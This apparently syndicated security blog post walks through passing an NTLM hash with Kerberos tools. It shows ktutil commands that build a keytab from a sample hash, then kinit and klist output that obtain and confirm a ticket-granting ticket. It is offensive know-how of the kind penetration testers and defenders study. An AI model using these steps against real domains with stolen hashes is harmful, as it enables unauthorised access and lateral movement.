Pass the Hash with Kerberos

This blog post may be of limited use, most of the time that you have a NTLM hash you have the tools to use it. But, if you find yourself in a situation where you don’t have to tools and do have kerberos tools, you can pass the hash with it.

Lets say with have the NTLM hash for the user uberuser and the hash is 88e4d9fabaecf3dec18dd80905521b29. The first step to do so is to create a keytab file using ktutil:

root@wpad:~# ktutil

At the ktutil prompt, type in the “add entry” (addent) command with the “principle” (-p) flag. Specify the user and an all uppercase version of the FQDN. Then the “KVNO” (-k 1), which is the key number. Finally the encryption type, which is rc4-hmac for NTLM hashes:

ktutil: addent -p [email protected] -k 1 -key -e rc4-hmac

After you hit enter you’ll get prompted for the rc4-hmac (NTLM) hash:

Key for [email protected] (hex): 88e4d9fabaecf3dec18dd80905521b29

Then we write the keytab file to disk and exit ktutil

ktutil: wkt /tmp/a.keytab
ktutil: exit

The last step before we can use our authentication is to create a kerberos ticket using our keytab file.

root@wpad:~# kinit -V -k -t /tmp/a.keytab -f [email protected]
Using default cache: /tmp/krb5cc_0
Using principal: [email protected]
Using keytab: /tmp/a.keytab
Authenticated to Kerberos v5

Validate it with klist:

root@wpad:~# klist
Ticket cache: FILE:/tmp/krb5cc_0
Default principal: [email protected]

Valid starting       Expires              Service principal
07/22/2018 21:38:43  07/23/2018 07:38:43  krbtgt/[email protected]
	renew until 07/23/2018 21:38:40

*** This is a Security Bloggers Network syndicated blog from authored by Malicious Link. Read the original post at: